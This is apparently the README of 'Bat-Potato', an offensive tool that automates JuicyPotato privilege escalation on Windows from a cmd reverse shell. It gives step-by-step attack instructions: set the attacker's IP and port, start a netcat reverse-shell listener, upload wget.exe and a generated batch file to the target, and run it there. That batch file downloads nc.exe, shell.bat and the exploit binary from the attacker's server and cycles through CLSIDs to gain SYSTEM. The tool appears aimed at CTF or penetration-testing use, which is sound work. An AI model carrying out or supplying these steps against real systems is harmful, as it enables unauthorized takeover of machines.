The binaries in this repository are the latest releases of each tool. Keep in mind you can replace them at any time.
Open Bat-Potato.py and change the default values:
- JUICY_REMOTE_PATH -> Working directory
- CLSID_file -> List of CLSIDs (under the /wordlist folder)
- LHOST -> Your IP
- LPORT -> Your attacker port
- LWEBSERVER_PORT -> Web server port that will host the mandatory files the .bat file will upload on the server
- JUICY_POTATO_BIN -> .exe of the JuicyPotato binary
python Bat-Potato.py
The server will listen for incoming requests. Keep that connection alive, open a new tab and start another listener for the reverse shell.
For example:
rlwrap nc -nvlp <port>
You must upload the following files to the server:
- wget.exe
- the Bat-Potato.bat file generated by the Python script
On the server, execute:
.\Bat-Potato.bat
This will download shell.bat, nc.exe and the Juicy binary from the server and will attempt the privesc by making all the CLSID requests automatically.
Then wait until pwn!
There are other alternatives to perform the Juicy privesc (https://github.com/TsukiCTF/Lovely-Potato); Bat-Potato's main purpose is to accomplish the privesc with just a cmd reverse shell. No PowerShell is required for these actions, so you can run this .bat file from a low-integrity cmd shell.
NOTE: As you can see in the generated .bat, hundreds of requests are made, and it will keep running until the list of CLSIDs is exhausted.
Bat-Potato_demo.mp4
If the video is not displayed, you can also click on this link: https://youtu.be/QL1NiryxGis
Thanks to prhp for the fantastic logo: https://www.reddit.com/r/krita/comments/prhpl0/bat_potato/